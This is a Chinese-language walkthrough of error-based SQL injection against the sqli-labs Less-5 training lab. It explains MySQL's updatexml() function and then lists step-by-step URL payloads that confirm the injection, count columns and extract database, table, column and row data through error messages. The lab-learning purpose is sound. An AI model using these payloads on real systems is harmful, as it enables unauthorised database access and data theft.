一、描述

updatexml(xml_target, xpath_expr, new_val)

• xml_target：要进行修改的 XML 类型的字段，或者是 XML 文档字符串。
• xpath_expr：XPath 表达式，用于定位要更新的节点。
• new_val：新的值，用于替换被定位到的节点的内容。

格式简化 updatexml(xx,concat(xx),xx)

concat函数用来拼接字符

把第二个参数改为非xpath格式 就会报错 但报错的信息是什么呢？

他会把校验失败的数据爆出来

第一个和第二个参数可以随便写 因为我们需要的是第二个参数的报错信息

二、做题

http://14.116.152.57:5100/Less-5/

1、判断类型

?id=1 and 1=1

?id=1 and 1=2

2、判断注入类型
?id=1" and 1=1
?id=1' and 1=2

 经过分析该场景为字符型注入

构造闭合

?id=1' and 1=1 -- q

查询字段数、
?id=1' order by 1 -- q

?id=1' order by 2 -- q

?id=1' order by 3 -- q

?id=1' order by 4 -- q

显位

?id=88' union select 1,2,3 -- q

 无法识别

发现即使调整了id的值 并没有产生回显点

没有显错位的注入 可以考虑从盲注入手

但这里先不采用盲注 用另一种报错信息方式updatexml来回显

3、updatexml报错

爆库
?id=1' and 1=1 and updatexml(1,concat('!',database(),'!'),1) -- q

爆表
?id=1' and 1=1 and updatexml(1,concat('!',(select table_name from information_schema.tables where table_schema="security" limit 0,1),'!'),1) -- q

爆列
?id=1' and 1=1 and updatexml(1,concat('!',(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),'!'),1) -- q

爆值
?id=1' and 1=1 and updatexml(1,concat('!',(select id from emails limit 0,1),'!'),1) -- q